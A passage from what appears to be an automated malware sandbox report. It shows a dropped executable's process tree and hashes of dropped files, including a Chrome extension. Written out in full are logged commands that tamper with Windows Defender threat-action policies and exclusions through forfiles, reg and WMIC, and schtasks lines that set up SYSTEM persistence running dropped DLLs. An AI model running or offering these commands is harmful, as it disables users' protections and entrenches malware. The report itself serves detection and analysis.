                                                                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                PID:3460
                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                schtasks /run /I /tn "unWjgiOqmrJvCJdsa"
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:3352
                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 348 -s 540
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                  PID:1760
                                                                                                                                                                                              • C:\Windows\Temp\HIoTiJfsoGzpkHVf\BoBXyALzskGUfla\OlHGHzZ.exe
                                                                                                                                                                                                C:\Windows\Temp\HIoTiJfsoGzpkHVf\BoBXyALzskGUfla\OlHGHzZ.exe 9Z /YXKfdidWN 385121 /S
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                • Drops Chrome extension
                                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                                PID:3868
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:1552
                                                                                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                      • Indirect Command Execution
                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                      PID:3228
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                        PID:2124
                                                                                                                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                            PID:556
                                                                                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                        • Indirect Command Execution
                                                                                                                                                                                                        PID:3136
                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                            PID:1508
                                                                                                                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                              PID:1388
                                                                                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                          forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                          • Indirect Command Execution
                                                                                                                                                                                                          PID:2500
                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                            PID:3068
                                                                                                                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                              PID:2496
                                                                                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                          forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                          • Indirect Command Execution
                                                                                                                                                                                                          PID:1700
                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                              PID:2984
                                                                                                                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                  PID:1372
                                                                                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                              forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                              • Indirect Command Execution
                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                              PID:3812
                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                  PID:1228
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                                                                    PID:916
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                                                                                      "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                        PID:2196
                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                schtasks /DELETE /F /TN "bAqRDoFVIdSJfWxTlj"
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                  PID:2588
                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:2524
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                      forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                      • Indirect Command Execution
                                                                                                                                                                                                                      PID:568
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                          PID:2700
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                                                            PID:1856
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                PID:1136
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                          forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                          • Indirect Command Execution
                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                          PID:952
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                              PID:2520
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                                                                PID:1924
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                  "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                    PID:660
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                            schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\BRWHUqYPU\PivAYq.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "MHiaqjbnoCNpItK" /V1 /F
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                            PID:1588
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                            schtasks /CREATE /TN "MHiaqjbnoCNpItK2" /F /xml "C:\Program Files (x86)\BRWHUqYPU\kdozuSG.xml" /RU "SYSTEM"
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                            PID:1864
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                            schtasks /END /TN "MHiaqjbnoCNpItK"
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                              PID:3556
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                              schtasks /DELETE /F /TN "MHiaqjbnoCNpItK"
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:584
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                schtasks /CREATE /TN "YQZkeEGXXGJdtu" /F /xml "C:\Program Files (x86)\GqgEBhsSxktU2\qDZQbYD.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                PID:2108
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                schtasks /CREATE /TN "cosGrOuVCynQy2" /F /xml "C:\ProgramData\PdOICyyFbClqQxVB\AhJiDqs.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                PID:3604
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                schtasks /CREATE /TN "PZmGxZPxdZZSPZWvU2" /F /xml "C:\Program Files (x86)\efiAzqQKrQpqActHLvR\hQgyTgi.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                PID:1932
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                schtasks /CREATE /TN "NzCzwfloobUmvfgYOrr2" /F /xml "C:\Program Files (x86)\OJMRwiGdhyaHC\cNYxSCn.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                PID:1136
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                schtasks /CREATE /TN "kjGlTxIfJQSbObiUU" /SC once /ST 05:01:17 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\HIoTiJfsoGzpkHVf\yjFQwtwT\tfhfnOY.dll\",#1 /xsXddidr 385121" /V1 /F
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                PID:1920
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                schtasks /run /I /tn "kjGlTxIfJQSbObiUU"
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:3380
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                  schtasks /CREATE /TN "tvUci1" /SC once /ST 18:45:22 /F /RU "Admin" /TR "\"C:\Program Files\Mozilla Firefox\firefox.exe\""
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                  PID:3732
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                  schtasks /run /I /tn "tvUci1"
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                    PID:3336
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                    schtasks /DELETE /F /TN "tvUci1"
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                      PID:3936
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                      schtasks /DELETE /F /TN "unWjgiOqmrJvCJdsa"
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                        PID:3480
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3868 -s 1544
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                        PID:2420
                                                                                                                                                                                                                                    • C:\Windows\system32\rundll32.EXE
                                                                                                                                                                                                                                      C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\HIoTiJfsoGzpkHVf\yjFQwtwT\tfhfnOY.dll",#1 /xsXddidr 385121
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                        PID:2064
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                          C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\HIoTiJfsoGzpkHVf\yjFQwtwT\tfhfnOY.dll",#1 /xsXddidr 385121
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                          • Blocklisted process makes network request
                                                                                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                          PID:3024
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                            schtasks /DELETE /F /TN "kjGlTxIfJQSbObiUU"
                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                            PID:3228
                                                                                                                                                                                                                                    • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe "1624443837184565854747565452819301452621085953470-1057448778-2044092830-817923691"
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                        PID:2100
                                                                                                                                                                                                                                      • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                                                                        gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                          PID:3916
                                                                                                                                                                                                                                        • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                                                                          gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                            PID:1372
                                                                                                                                                                                                                                          • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe "-11042008261123050480849679319-782560941-582638660179606233-1075282566-827124451"
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                              PID:2324
                                                                                                                                                                                                                                            • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                                                                              gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                PID:3280

                                                                                                                                                                                                                                              Network

                                                                                                                                                                                                                                              MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                              Replay Monitor

                                                                                                                                                                                                                                              Loading Replay Monitor...

                                                                                                                                                                                                                                              Downloads

                                                                                                                                                                                                                                              • C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                2.1MB

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                f13ce8830cc32f9c24db4356e41fba76

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                7cd5805afbf8a6eb1e9dac41eb46babfc26a36a3

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                09d7cd4602af7373faade4bebd7a4537887fdca14fd7921fd50b7205a1c6144b

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                9e76037507332ed798e77b9d814d5c639b976d6793a8811e94f4b4a0c82a4444285dd53be5d26099eb9015189aea50335107b3c98c889a8c407b2b7494267c1a

                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1KB

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                a266bb7dcc38a562631361bbf61dd11b

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                3b1efd3a66ea28b16697394703a72ca340a05bd5

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                342B

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                9a4e9b9fd9bb877450410f12ed4e8403

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                6a92157b30c11a27e556ae89df3c6118b9a1fcfb

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                fae0e38ee5c00b223e4044a5f560b8626597b0dcc195deb3a6ae41f0f85ee78f

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                21d7a1c6ae35094db475e36bac868e5c644ce04421330938d3aee5f1f677bea675b1c7ef60ea1a4c42589ec7f7740dbf25beeb322317549188f1e2275d0de28e

                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                342B

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                b310cdf1601b5bd27097ebbd2354cfcf

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                3a29bb75a60b036e26880ad62af7dd843402f357

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                219c1ae64b6969a9dfc1615459dda9f601a44acc3e2f188240a5d32b4476a6c6

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                ac8d893657f600bf1a611fa59513706e12cc348292123bc059915bfc80d86b19aff6567c92ae9936518d7d2f36862e2cc4717961ab66237aafed74f66d30573f

                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                242B

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                f9a98de26c3e5f95e3301e079a6e5c2e

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                7dd724f98cae051548f4ed1a077a975710eadf0b

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                80e92588363b4ccb5d6e2393addd1f618be6438dda3889b86a9be1ccb3ce7197

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                29eba76e32996e4a5a7df5d37a8168c8cf9ca5bd2b254384bb6297c552efb7d208b2f36cbce807f036014c1c69594e2d60604d6b9ff0ad4ccaa0e9d2b0826b81

                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                187B

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                2a1e12a4811892d95962998e184399d8

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                136B

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                238d2612f510ea51d0d3eaa09e7136b1

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                150B

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                6a51537cef82143d3d768759b21598542d683904

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                9KB

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                1599070ba0c310e6ee85f27255ba8a4b

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                f88158b9ecbff2d46e93d5d6fc98b9e2fbedd1ab

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                1e7097872cd73e12af38804b584a746f125ddb484e591d94d6b078c4c79a4feb

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                b6cdcd1095f29e3cb4244dc367f14822068fa87f3c00fcfcff1a005263ba4f585ac8841392e5d4bfba0dbacd72aa562ae5c3054a725a59eba1bf2056040135c9

                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                26KB

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                4f83b1b12dd3a235ddb22ec518fa578b

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                13b281238aff3fe129b575420c0244e27971adee

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                a600e5ef1ca743b213edb331cbb05739a472d3197a37855a211c37f9fbf959ef

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                1454e641bb9b05cdfe955d72692e531eeea5ff6a378a5c68a4c070b16511a670e7ab9bbbb0af463e04e126e83ec40d17db0d5161be75ba4f1af4d63030c939de

                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bz1ih2a5.default-release\activity-stream.discovery_stream.json.tmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                32KB

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                05d6c54df8f7f5fcbe73b508da4d0983

